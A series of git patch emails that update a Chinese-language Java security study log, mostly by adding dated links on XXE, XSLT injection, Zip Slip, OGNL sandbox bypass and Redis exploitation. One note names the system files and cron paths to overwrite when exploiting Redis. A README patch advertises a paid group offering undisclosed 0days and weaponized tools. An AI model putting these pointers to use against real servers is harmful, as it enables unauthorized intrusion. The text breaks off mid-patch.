From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 14 Jan 2023 13:35:29 +0800 Subject: [PATCH 177/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 5cd40c4..fa856a2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -248,3 +248,4 @@ + 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** + 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) [某app测试](https://mp.weixin.qq.com/s/_7wSWy0gIMMZmVeOtFgdsw) + 2023/01/13 [JVM Shellcode注入探索](https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A) **np** ++ 2023/01/14 [第46篇:伊朗APT组织入侵美国政府内网全过程揭秘(上篇)](https://mp.weixin.qq.com/s/LarjLeYFqDQh7I0jpFZwHA) From 191e6674e4a3993acc1a01c8081712e70ee10d2a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 16 Jan 2023 22:15:51 +0800 Subject: [PATCH 178/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index fa856a2..3606571 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -249,3 +249,4 @@ + 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) [某app测试](https://mp.weixin.qq.com/s/_7wSWy0gIMMZmVeOtFgdsw) + 2023/01/13 [JVM Shellcode注入探索](https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A) **np** + 2023/01/14 [第46篇:伊朗APT组织入侵美国政府内网全过程揭秘(上篇)](https://mp.weixin.qq.com/s/LarjLeYFqDQh7I0jpFZwHA) ++ 2023/01/16 [Hacking Redis for fun and CTF points,redis的利用](https://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec1) **npnp** 
From 1be80eadba1f76a4eb84f4abf2b07e5696500e67 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 Jan 2023 20:44:55 +0800 Subject: [PATCH 179/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 3606571..c207098 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -250,3 +250,4 @@ + 2023/01/13 [JVM Shellcode注入探索](https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A) **np** + 2023/01/14 [第46篇:伊朗APT组织入侵美国政府内网全过程揭秘(上篇)](https://mp.weixin.qq.com/s/LarjLeYFqDQh7I0jpFZwHA) + 2023/01/16 [Hacking Redis for fun and CTF points,redis的利用](https://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec1) **npnp** ++ 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) From 67c2289b0cb2eb372d11a8e329ed26d38e1db2a7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 Jan 2023 20:50:12 +0800 Subject: [PATCH 180/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c207098..ff05aa6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -251,3 +251,4 @@ + 2023/01/14 [第46篇:伊朗APT组织入侵美国政府内网全过程揭秘(上篇)](https://mp.weixin.qq.com/s/LarjLeYFqDQh7I0jpFZwHA) + 2023/01/16 [Hacking Redis for fun and CTF points,redis的利用](https://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec1) **npnp** + 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) ++ 2023/01/17 [玩转CodeQLpy之用友GRP-U8漏洞挖掘](https://mp.weixin.qq.com/s/hYPdNN6skbikC3FFYRlbrQ) **可以尝试用vi跑一下** 
From cc0aabe127367c713599492f11724ee386d0a750 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 Jan 2023 21:24:24 +0800 Subject: [PATCH 181/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ff05aa6..d65ef33 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -252,3 +252,4 @@ + 2023/01/16 [Hacking Redis for fun and CTF points,redis的利用](https://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec1) **npnp** + 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) + 2023/01/17 [玩转CodeQLpy之用友GRP-U8漏洞挖掘](https://mp.weixin.qq.com/s/hYPdNN6skbikC3FFYRlbrQ) **可以尝试用vi跑一下** ++ 2023/01/17 [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s?__biz=Mzg4MzY5NjIyMg==&mid=2247483755&idx=1&sn=4e9ae8be2a0950ecfe99281689001e06&chksm=cf42365af835bf4ceb041fdbbb108cffbfbef253f41d9197760e11f774749eeb1e721f070fd8&mpshare=1&scene=23&srcid=0117LLaambwHZZNnlAY1Pqnm&sharer_sharetime=1673954336737&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **np 学习** From ac0e8d7063b6359c970cb4ac945aaaf57a662d0c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 Jan 2023 21:48:25 +0800 Subject: [PATCH 182/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d65ef33..e6b61d1 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -253,3 +253,4 @@ + 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) + 2023/01/17 [玩转CodeQLpy之用友GRP-U8漏洞挖掘](https://mp.weixin.qq.com/s/hYPdNN6skbikC3FFYRlbrQ) **可以尝试用vi跑一下** + 2023/01/17 [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s?__biz=Mzg4MzY5NjIyMg==&mid=2247483755&idx=1&sn=4e9ae8be2a0950ecfe99281689001e06&chksm=cf42365af835bf4ceb041fdbbb108cffbfbef253f41d9197760e11f774749eeb1e721f070fd8&mpshare=1&scene=23&srcid=0117LLaambwHZZNnlAY1Pqnm&sharer_sharetime=1673954336737&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **np 学习** ++ 2023/1/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** From ec1cb285491fd139f59d213a37d4345441ac661e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 18 Jan 2023 11:20:02 +0800 Subject: [PATCH 183/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e6b61d1..9768ff0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -253,4 +253,5 @@ + 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) + 2023/01/17 [玩转CodeQLpy之用友GRP-U8漏洞挖掘](https://mp.weixin.qq.com/s/hYPdNN6skbikC3FFYRlbrQ) **可以尝试用vi跑一下** + 2023/01/17 [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s?__biz=Mzg4MzY5NjIyMg==&mid=2247483755&idx=1&sn=4e9ae8be2a0950ecfe99281689001e06&chksm=cf42365af835bf4ceb041fdbbb108cffbfbef253f41d9197760e11f774749eeb1e721f070fd8&mpshare=1&scene=23&srcid=0117LLaambwHZZNnlAY1Pqnm&sharer_sharetime=1673954336737&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **np 学习** -+ 2023/1/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** ++ 2023/01/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** ++ 2023/01/18 [从“假漏洞”到“不忘初心”](https://mp.weixin.qq.com/s?__biz=Mzg5OTU1NTEwMg==&mid=2247483948&idx=1&sn=f4a1cbe8131ce0812714fda95147bc79&chksm=c050c85df727414bb25fb90e52edf81bc1d2ae6222cc29d54d4e810537e0c83bf579958a3e4c&mpshare=1&scene=23&srcid=0117ma1Ywz1TACmdsaaIMMTP&sharer_sharetime=1674008997482&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 1fc5c76155b9aeb97473377980dc3a810f1a34c4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 19 Jan 2023 11:49:29 +0800 Subject: [PATCH 184/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9768ff0..4d61315 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -255,3 +255,4 @@ + 2023/01/17 [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s?__biz=Mzg4MzY5NjIyMg==&mid=2247483755&idx=1&sn=4e9ae8be2a0950ecfe99281689001e06&chksm=cf42365af835bf4ceb041fdbbb108cffbfbef253f41d9197760e11f774749eeb1e721f070fd8&mpshare=1&scene=23&srcid=0117LLaambwHZZNnlAY1Pqnm&sharer_sharetime=1673954336737&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **np 学习** + 2023/01/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** + 2023/01/18 [从“假漏洞”到“不忘初心”](https://mp.weixin.qq.com/s?__biz=Mzg5OTU1NTEwMg==&mid=2247483948&idx=1&sn=f4a1cbe8131ce0812714fda95147bc79&chksm=c050c85df727414bb25fb90e52edf81bc1d2ae6222cc29d54d4e810537e0c83bf579958a3e4c&mpshare=1&scene=23&srcid=0117ma1Ywz1TACmdsaaIMMTP&sharer_sharetime=1674008997482&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/01/19 [分享几个 IDEA 下 git 使用小技巧](https://www.bilibili.com/video/BV1yW4y1N7mR/?buvid=Y8497289E888F86F46BC91648B98C847C1AA&is_story_h5=false&mid=Rbxe%2Bk7llEVOThj%2FWkKmvQ%3D%3D&p=1&plat_id=116&share_from=ugc&share_medium=iphone&share_plat=ios&share_session_id=C5D45C2B-571E-4A34-8425-2082CA8630B3&share_source=QQ&share_tag=s_i×tamp=1674063016&unique_k=FWgBBSP&up_id=186408046) **确实有用** From 94b68f51ef75f2973710e5f90577f552895ee95c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 19 Jan 2023 21:30:16 +0800 Subject: [PATCH 185/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4d61315..db647b6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -256,3 +256,4 @@ + 2023/01/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** + 2023/01/18 [从“假漏洞”到“不忘初心”](https://mp.weixin.qq.com/s?__biz=Mzg5OTU1NTEwMg==&mid=2247483948&idx=1&sn=f4a1cbe8131ce0812714fda95147bc79&chksm=c050c85df727414bb25fb90e52edf81bc1d2ae6222cc29d54d4e810537e0c83bf579958a3e4c&mpshare=1&scene=23&srcid=0117ma1Ywz1TACmdsaaIMMTP&sharer_sharetime=1674008997482&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/01/19 [分享几个 IDEA 下 git 使用小技巧](https://www.bilibili.com/video/BV1yW4y1N7mR/?buvid=Y8497289E888F86F46BC91648B98C847C1AA&is_story_h5=false&mid=Rbxe%2Bk7llEVOThj%2FWkKmvQ%3D%3D&p=1&plat_id=116&share_from=ugc&share_medium=iphone&share_plat=ios&share_session_id=C5D45C2B-571E-4A34-8425-2082CA8630B3&share_source=QQ&share_tag=s_i×tamp=1674063016&unique_k=FWgBBSP&up_id=186408046) **确实有用** ++ 2023/01/19 [CVE-2022-35741 Apache CloudStack SAML XXE注入](https://xz.aliyun.com/t/11600) **Apache CloudStack 云计算的东西国内没有看到过** From b3272af2213f62639a2bca057439f7f19d2969ee Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 19 Jan 2023 23:23:54 +0800 Subject: [PATCH 186/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index db647b6..c0dda1a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -257,3 +257,4 @@ + 2023/01/18 [从“假漏洞”到“不忘初心”](https://mp.weixin.qq.com/s?__biz=Mzg5OTU1NTEwMg==&mid=2247483948&idx=1&sn=f4a1cbe8131ce0812714fda95147bc79&chksm=c050c85df727414bb25fb90e52edf81bc1d2ae6222cc29d54d4e810537e0c83bf579958a3e4c&mpshare=1&scene=23&srcid=0117ma1Ywz1TACmdsaaIMMTP&sharer_sharetime=1674008997482&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/01/19 [分享几个 IDEA 下 git 使用小技巧](https://www.bilibili.com/video/BV1yW4y1N7mR/?buvid=Y8497289E888F86F46BC91648B98C847C1AA&is_story_h5=false&mid=Rbxe%2Bk7llEVOThj%2FWkKmvQ%3D%3D&p=1&plat_id=116&share_from=ugc&share_medium=iphone&share_plat=ios&share_session_id=C5D45C2B-571E-4A34-8425-2082CA8630B3&share_source=QQ&share_tag=s_i×tamp=1674063016&unique_k=FWgBBSP&up_id=186408046) **确实有用** + 2023/01/19 [CVE-2022-35741 Apache CloudStack SAML XXE注入](https://xz.aliyun.com/t/11600) **Apache CloudStack 云计算的东西国内没有看到过** ++ 2023/01/19 [Xalan包在XXE问题中的坑](https://www.freebuf.com/vuls/238005.html) **之前就遇到了如果有xalan依赖的时候会导致xxe防御失去效果** From d3a20de2adfd2da8f2b9b9bec716fd7d01134ab2 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 23 Jan 2023 19:52:29 +0800 Subject: [PATCH 187/257] Update README.md --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index e2e39f6..907e11b 100644 --- a/README.md +++ b/README.md @@ -26,6 +26,12 @@ + 2022/10/07 [添加JDK里面的trick](Jdk) 💛 💙 💜 ❤️ 💚 +## 知识星球 +该知识星球主要是分享java相关的安全知识,绝对精华.里面包含未开放的1day和0day等分享或武器化工具一发入魂 + +![image](https://user-images.githubusercontent.com/63966847/214033050-87bdd0f8-4982-4aac-b79d-a5b6d0f107b9.png) + + ## 代学习 From 44384ae543ee83a3e6304345b972046f895d49c8 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 29 Jan 2023 15:12:19 +0800 Subject: [PATCH 188/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c0dda1a..9f83a8d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -258,3 +258,4 @@ + 2023/01/19 [分享几个 IDEA 下 git 使用小技巧](https://www.bilibili.com/video/BV1yW4y1N7mR/?buvid=Y8497289E888F86F46BC91648B98C847C1AA&is_story_h5=false&mid=Rbxe%2Bk7llEVOThj%2FWkKmvQ%3D%3D&p=1&plat_id=116&share_from=ugc&share_medium=iphone&share_plat=ios&share_session_id=C5D45C2B-571E-4A34-8425-2082CA8630B3&share_source=QQ&share_tag=s_i×tamp=1674063016&unique_k=FWgBBSP&up_id=186408046) **确实有用** + 2023/01/19 [CVE-2022-35741 Apache CloudStack SAML XXE注入](https://xz.aliyun.com/t/11600) **Apache CloudStack 云计算的东西国内没有看到过** + 2023/01/19 [Xalan包在XXE问题中的坑](https://www.freebuf.com/vuls/238005.html) **之前就遇到了如果有xalan依赖的时候会导致xxe防御失去效果** ++ 2023/01/29 [红队:IIS短文件名猜解在拿权限中的巧用](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247491093&idx=1&sn=9ebedfadd4b86cbb319c085fdfbdaf1d&chksm=cea8f555f9df7c4370ab5efe4248c3ca144381556d6299c2e9ab1d83229a38ad82b208f70cb6&mpshare=1&scene=23&srcid=0128dKktHmtVydWzC2jEaQ44&sharer_sharetime=1674914927543&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **了解** From 4b605c634c1a23f2164c158a98e9f19dda10e911 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 29 Jan 2023 21:18:09 +0800 Subject: [PATCH 189/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9f83a8d..2f83594 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -259,3 +259,4 @@ + 2023/01/19 [CVE-2022-35741 Apache CloudStack SAML XXE注入](https://xz.aliyun.com/t/11600) **Apache CloudStack 云计算的东西国内没有看到过** + 2023/01/19 [Xalan包在XXE问题中的坑](https://www.freebuf.com/vuls/238005.html) **之前就遇到了如果有xalan依赖的时候会导致xxe防御失去效果** + 2023/01/29 [红队:IIS短文件名猜解在拿权限中的巧用](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247491093&idx=1&sn=9ebedfadd4b86cbb319c085fdfbdaf1d&chksm=cea8f555f9df7c4370ab5efe4248c3ca144381556d6299c2e9ab1d83229a38ad82b208f70cb6&mpshare=1&scene=23&srcid=0128dKktHmtVydWzC2jEaQ44&sharer_sharetime=1674914927543&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **了解** ++ 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** From 0437e1595880648d415a00c62d4d5ca3080316c7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 29 Jan 2023 22:49:25 +0800 Subject: [PATCH 190/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2f83594..458b7e4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -260,3 +260,4 @@ + 2023/01/19 [Xalan包在XXE问题中的坑](https://www.freebuf.com/vuls/238005.html) **之前就遇到了如果有xalan依赖的时候会导致xxe防御失去效果** + 2023/01/29 [红队:IIS短文件名猜解在拿权限中的巧用](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247491093&idx=1&sn=9ebedfadd4b86cbb319c085fdfbdaf1d&chksm=cea8f555f9df7c4370ab5efe4248c3ca144381556d6299c2e9ab1d83229a38ad82b208f70cb6&mpshare=1&scene=23&srcid=0128dKktHmtVydWzC2jEaQ44&sharer_sharetime=1674914927543&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **了解** + 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** ++ 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** From d4f3e447859646d735c8f861ea6ab9da39f693d3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 30 Jan 2023 15:23:12 +0800 Subject: [PATCH 191/257] Update Readme.md --- shell/OGNL/Readme.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/shell/OGNL/Readme.md b/shell/OGNL/Readme.md index b09dfcf..9b83e7d 100644 --- a/shell/OGNL/Readme.md +++ b/shell/OGNL/Readme.md @@ -41,6 +41,9 @@ String bypass_sm_exp = "var str = Java.type('java.lang.String[]').class;" + >参考 >https://www.sec-in.com/article/753 >https://www.mi1k7ea.com/2020/03/16/OGNL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/ +## Bypass + +https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/ ## mybatis 存在${}的ognl 参考2022的d3ctf ezsql From 9ca0f18f5e4982381bb8801c282bb8bf83182282 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 30 Jan 2023 15:54:59 +0800 Subject: [PATCH 192/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 458b7e4..6f2dab2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -261,3 +261,4 @@ + 2023/01/29 [红队:IIS短文件名猜解在拿权限中的巧用](https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247491093&idx=1&sn=9ebedfadd4b86cbb319c085fdfbdaf1d&chksm=cea8f555f9df7c4370ab5efe4248c3ca144381556d6299c2e9ab1d83229a38ad82b208f70cb6&mpshare=1&scene=23&srcid=0128dKktHmtVydWzC2jEaQ44&sharer_sharetime=1674914927543&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **了解** + 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** + 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** ++ 2023/01/30 [Docmosis Tornado的漏洞](https://frycos.github.io/vulns4free/2023/01/24/0days-united-nations.html) From 0de7647bb752430b676cb3463695a02e22a25709 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 1 Feb 2023 12:04:32 +0800 Subject: [PATCH 193/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6f2dab2..97cb930 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -262,3 +262,4 @@ + 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** + 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** + 2023/01/30 [Docmosis Tornado的漏洞](https://frycos.github.io/vulns4free/2023/01/24/0days-united-nations.html) ++ 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) 
From 34024c8050995e60f0eb8d54ac8ef14e5b783284 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 1 Feb 2023 19:14:22 +0800 Subject: [PATCH 194/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 97cb930..bbe8fa6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -262,4 +262,5 @@ + 2023/01/29 [PHP Development Server <= 7.4.21 - Remote Source Disclosure](https://blog.projectdiscovery.io/php-http-server-source-disclosure/) **np** + 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** + 2023/01/30 [Docmosis Tornado的漏洞](https://frycos.github.io/vulns4free/2023/01/24/0days-united-nations.html) -+ 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) ++ 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) ++ 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) **可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** From 98d47619c28482ef86504e731e4eff8f8c45bc48 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 2 Feb 2023 20:28:03 +0800 Subject: [PATCH 195/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bbe8fa6..20d2377 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -263,4 +263,5 @@ + 2023/01/29 [Java Zip Slip漏洞案例分析及实战挖掘](https://xz.aliyun.com/t/12081) **主要是fix的代码可能有问题 一部分开发人员判断的是startwith** + 2023/01/30 [Docmosis Tornado的漏洞](https://frycos.github.io/vulns4free/2023/01/24/0days-united-nations.html) + 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) -+ 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) **可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** ++ 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) ** 可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** ++ 2023/02/02 [水平越权挖掘技巧与自动化越权漏洞检测](https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8) From 8f2c86d4f92990975fbce31449874276bad6310c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 3 Feb 2023 23:34:23 +0800 Subject: [PATCH 196/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 